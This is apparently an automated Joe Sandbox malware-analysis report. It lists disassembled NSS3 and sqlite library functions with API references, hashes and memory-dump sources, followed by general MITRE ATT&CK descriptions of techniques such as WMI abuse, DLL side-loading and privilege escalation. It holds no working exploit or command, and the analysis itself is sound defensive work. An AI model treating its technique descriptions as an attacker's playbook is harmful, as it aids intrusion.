Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: f94df8409b0c5b3f2f43095bf807a218891305658fb0c01cd83ea5fcb6743e94
Instruction ID: 6558705b4c5467f983355348e3c657e6bf6e61141d9da1c0e597ac041606680f
Opcode Fuzzy Hash: f94df8409b0c5b3f2f43095bf807a218891305658fb0c01cd83ea5fcb6743e94
Instruction Fuzzy Hash: FE1127B5B502219BEB04CFA8E855A16B35AFB96350B044079ED088B300E738ED02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB9AB80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BB9AB8A
PR_SetError.NSS3(FFFFE897,00000000), ref: 6BB9AC07

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

PR_LogPrint.NSS3(connect -> %d,00000000), ref: 6BB9AC1A

Strings

connect -> %d, xrefs: 6BB9AC15

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$ErrorPrint
String ID: connect -> %d
API String ID: 1784924131-3487059786
Opcode ID: 9d0b4e4b5fdc31d59647c3b6000609327445586a1a5b722219897085b568d0da
Instruction ID: 35d1f8308b3df7a0e41ce94c99a09bf3325c006f4a566234f537b44cd4db7cfa
Opcode Fuzzy Hash: 9d0b4e4b5fdc31d59647c3b6000609327445586a1a5b722219897085b568d0da
Instruction Fuzzy Hash: 12014971D001849FF7003F38EC07B7E3B62EB53319F448674E8198A161F7798990CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC2BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BCC2BFA
PR_ExitMonitor.NSS3 ref: 6BCC2C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6BCC2C5D

Strings

%s incr => %d (for %s), xrefs: 6BCC2C58

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: ddd107f70e9896557789e6c9fafcf248615048e14a5680ec1a2bc3520118ff85
Instruction ID: 9393a5754c62f1bd7e3d9125cc90f23cb13267166efc211bdb1703cc59a1f2a7
Opcode Fuzzy Hash: ddd107f70e9896557789e6c9fafcf248615048e14a5680ec1a2bc3520118ff85
Instruction Fuzzy Hash: 45012871E10210AFF7119F25DC41607B7B9EB5575CB044079D8498B202FB3AEE06C792

Uniqueness

Uniqueness Score: -1.00%

Function 6BBAC9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6BBACB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6BBACB4B
sqlite3_free.NSS3 ref: 6BBACB70
sqlite3_result_error_nomem.NSS3 ref: 6BBACB99

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: 70f5e1403eb0ffea96cccfeefc8c267f1fef1b547076d0cdfac601c2eee070df
Instruction ID: 3d5c8ff2f16cfbc5349af627340d652ea01017c50427614d913e69e45fa809d3
Opcode Fuzzy Hash: 70f5e1403eb0ffea96cccfeefc8c267f1fef1b547076d0cdfac601c2eee070df
Instruction Fuzzy Hash: 9651CD3291CB898AC711DF34C84022FB7F1FF8AB94F008A5DE8956A194EB39D485C792

Uniqueness

Uniqueness Score: -1.00%

Function 6BC7AAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BD10D9C,00000000), ref: 6BC7AAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BD10DA8,00000000), ref: 6BC7AAE3

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: _initialize_onexit_table
String ID:
API String ID: 2450287516-0
Opcode ID: 7e1789cbb33d37edd874fa3d91b19ee34b640f01a7349d15cb61c0bda53ef45d
Instruction ID: 439d00870a69b59bb120f16c1bbb6effd17d1549195740c3630d6d576a760989
Opcode Fuzzy Hash: 7e1789cbb33d37edd874fa3d91b19ee34b640f01a7349d15cb61c0bda53ef45d
Instruction Fuzzy Hash: B821A171D24209ABDF10FF78D90268E77A6DF46364F0040A5FD24EB290F779EA518B61

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDABF0 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6BBDAC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BBDAC26
PR_Now.NSS3 ref: 6BBDAC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6BBDAC6E

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID:
API String ID: 3008928262-0
Opcode ID: 56636f6cc30960a94ef27e6e44806f90fcbe9cce99b0bd164b13770f255262c0
Instruction ID: 83b1025896fb89ace0716d104da2d36f486a28ae680af9567bb5b28ae738c1fa
Opcode Fuzzy Hash: 56636f6cc30960a94ef27e6e44806f90fcbe9cce99b0bd164b13770f255262c0
Instruction Fuzzy Hash: 3E119671A006456FA7009F799C8297F77E8EF45264B880478FE14C7221FB7CD9148AA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB69B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6BBB6AB7,0000000C,00000001,00000000,?,?,6BBB6AB7,?,00000000,?), ref: 6BBB69CE

Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC110F3
Part of subcall function 6BC110C0: EnterCriticalSection.KERNEL32(?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1110C
Part of subcall function 6BC110C0: PL_ArenaAllocate.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11141
Part of subcall function 6BC110C0: PR_Unlock.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11182
Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1119C

SEC_ASN1EncodeItem_Util.NSS3(6BBB6AB7,0000001C,00000004,?,00000001,00000000), ref: 6BBB6A06
SEC_ASN1EncodeItem_Util.NSS3(6BBB6AB7,?,00000000,?,00000001,00000000,?,?,6BBB6AB7,?,00000000,?), ref: 6BBB6A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6BBB6AB7,?,00000000,?), ref: 6BBB6A42

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: 6a1b6b477d0f8e7e1fc3a50fcd1279cac420cea70c14db3e4b81ec403b9fd312
Instruction ID: 51cafa9d97487fb16e44d11dfe805bca168e05284d6b25f9d1344f8beb48e1e6
Opcode Fuzzy Hash: 6a1b6b477d0f8e7e1fc3a50fcd1279cac420cea70c14db3e4b81ec403b9fd312
Instruction Fuzzy Hash: 7A11E375A10245AFEB10CF29DC81B26B3ACEF4475CF008469EA1AC3241FB39ED51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6BCCCB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6BC79890: TlsGetValue.KERNEL32(?,?,?,6BC797EB), ref: 6BC7989E

EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6BC45262,?,?,?,6BC3E333,?,?,6BC3DC77), ref: 6BCCCB47
_PR_MD_UNLOCK.NSS3(-0000001A,?,6BC45262,?,?,?,6BC3E333,?,?,6BC3DC77), ref: 6BCCCB99
_PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6BC45262,?,?,?,6BC3E333,?,?,6BC3DC77), ref: 6BCCCBC3
_PR_MD_NOTIFY_CV.NSS3(?,?,?,6BC45262,?,?,?,6BC3E333,?,?,6BC3DC77), ref: 6BCCCBD2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: 8b479da3a4493eff81a6a90037e2c16f8c59a92fb5c82efc3f072e67ee267545
Instruction ID: 7a1af526afe5b19fe22c16bf0abbe3cbd3d60960a69163e98dde594a8646c95e
Opcode Fuzzy Hash: 8b479da3a4493eff81a6a90037e2c16f8c59a92fb5c82efc3f072e67ee267545
Instruction Fuzzy Hash: 9811BE72C21615ABD3109FB1C851B07B3B4FF20369F1482AAD81897601F779EAD1CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC04900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6BBEC79F,?,?,6BC05C4A,?), ref: 6BC04950

Part of subcall function 6BC08800: TlsGetValue.KERNEL32(?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC08821
Part of subcall function 6BC08800: TlsGetValue.KERNEL32(?,?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC0883D
Part of subcall function 6BC08800: EnterCriticalSection.KERNEL32(?,?,?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC08856
Part of subcall function 6BC08800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BC08887
Part of subcall function 6BC08800: PR_Unlock.NSS3(?,?,?,?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC08899

TlsGetValue.KERNEL32(?,?,?), ref: 6BC0496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC0497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC04989

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 07b6cc3820a4eac47e5e2f41b700f1fe1e0ffb18ae672fa75c21bc0b867000aa
Instruction ID: 80a21be8c579c1f6c739277e2f844b38b319dfd9d9bcdbdad8953a1a7e2006a2
Opcode Fuzzy Hash: 07b6cc3820a4eac47e5e2f41b700f1fe1e0ffb18ae672fa75c21bc0b867000aa
Instruction Fuzzy Hash: F211E6759142019BEB005F78DC82A17B3BCFB26329B444174E9599B211FB27EA1187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC049C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6BC08800: TlsGetValue.KERNEL32(?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC08821
Part of subcall function 6BC08800: TlsGetValue.KERNEL32(?,?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC0883D
Part of subcall function 6BC08800: EnterCriticalSection.KERNEL32(?,?,?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC08856
Part of subcall function 6BC08800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BC08887
Part of subcall function 6BC08800: PR_Unlock.NSS3(?,?,?,?,6BC1085A,00000000,?,6BBB8369,?), ref: 6BC08899

PR_SetError.NSS3 ref: 6BC04A10
TlsGetValue.KERNEL32(6BBF781D,?,6BBEBD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC04A24
EnterCriticalSection.KERNEL32(?,?,?,6BBEBD28,00CD52E8), ref: 6BC04A39
PR_Unlock.NSS3(?,?,?,?,6BBEBD28,00CD52E8), ref: 6BC04A4E

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 2e481268e24a67c958b053c2791c968415bd95a2b61145695bac256d196219be
Instruction ID: 8a23200bfe43d6c449d1d8fc7237155c7c929577e12964a503bb37e36343ba05
Opcode Fuzzy Hash: 2e481268e24a67c958b053c2791c968415bd95a2b61145695bac256d196219be
Instruction Fuzzy Hash: 51219375A187018FDB00AF79C48552BB7F8FF55704F014968D8858B301FB36D550CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBAEAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6BBAEB13
htonl.WSOCK32(00000000,?), ref: 6BBAEB26
htons.WSOCK32(?), ref: 6BBAEB44
PR_GetCurrentThread.NSS3(?), ref: 6BBAEB58

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: htons$CurrentThreadhtonl
String ID:
API String ID: 2156189399-0
Opcode ID: fca8cc5cb5e53000a6b5a32df2991fd4311912584fe19e0851e2f7269621a002
Instruction ID: bb730831c0961a65dd8c3a8865e5e48b716b20dd54e3c09800bc7b0738b7e9d8
Opcode Fuzzy Hash: fca8cc5cb5e53000a6b5a32df2991fd4311912584fe19e0851e2f7269621a002
Instruction Fuzzy Hash: 2D11B261C38BD297D3208F35884667E73A4FFA6704F52AB1EE8CA47562E778A1D0C315

Uniqueness

Uniqueness Score: -1.00%

Function 6BC42BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BC42A28,00000060,00000001), ref: 6BC42BF0

Part of subcall function 6BBB95B0: TlsGetValue.KERNEL32(00000000,?,6BBD00D2,00000000), ref: 6BBB95D2
Part of subcall function 6BBB95B0: EnterCriticalSection.KERNEL32(?,?,?,6BBD00D2,00000000), ref: 6BBB95E7
Part of subcall function 6BBB95B0: PR_Unlock.NSS3(?,?,?,?,6BBD00D2,00000000), ref: 6BBB9605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BC42A28,00000060,00000001), ref: 6BC42C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6BC42A28,00000060,00000001), ref: 6BC42C1E
free.MOZGLUE(?,00000000,00000000,?,6BC42A28,00000060,00000001), ref: 6BC42C4A

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: 736655e8c20a61ec09e1145e989bd7dfc62f095928119dd784553e5b416dadba
Instruction ID: 85e0ee4f07a20adfa7c7b8ec7c0de756aebdb8dedcca21a7d5ef747a7f4449ba
Opcode Fuzzy Hash: 736655e8c20a61ec09e1145e989bd7dfc62f095928119dd784553e5b416dadba
Instruction Fuzzy Hash: 8D018EB1E207404BEB20CF35D916B17B7E8AF50604F000A28E89AC7641FB39F744C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA0900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6BCA0917
sqlite3_value_text.NSS3(?), ref: 6BCA0923

Part of subcall function 6BB613C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6BB32352,?,00000000,?,?), ref: 6BB61413
Part of subcall function 6BB613C0: memcpy.VCRUNTIME140(00000000,6BB32352,00000002,?,?,?,?,6BB32352,?,00000000,?,?), ref: 6BB614C0

Strings

error in %s %s%s%s: %s, xrefs: 6BCA0944

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: b8c8e01a6d74658862e7ed861617a6f8ef115e519dab01a757a1cb0de1bb9fb4
Instruction ID: c853eb1387157c54a10e2d64c15c348e9423ffe0003caddd453183138c1d3507
Opcode Fuzzy Hash: b8c8e01a6d74658862e7ed861617a6f8ef115e519dab01a757a1cb0de1bb9fb4
Instruction Fuzzy Hash: 050148B6E041489FEB009F68EC0197E7BB5EFC0258F044038EC485B301FB329E2083A2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

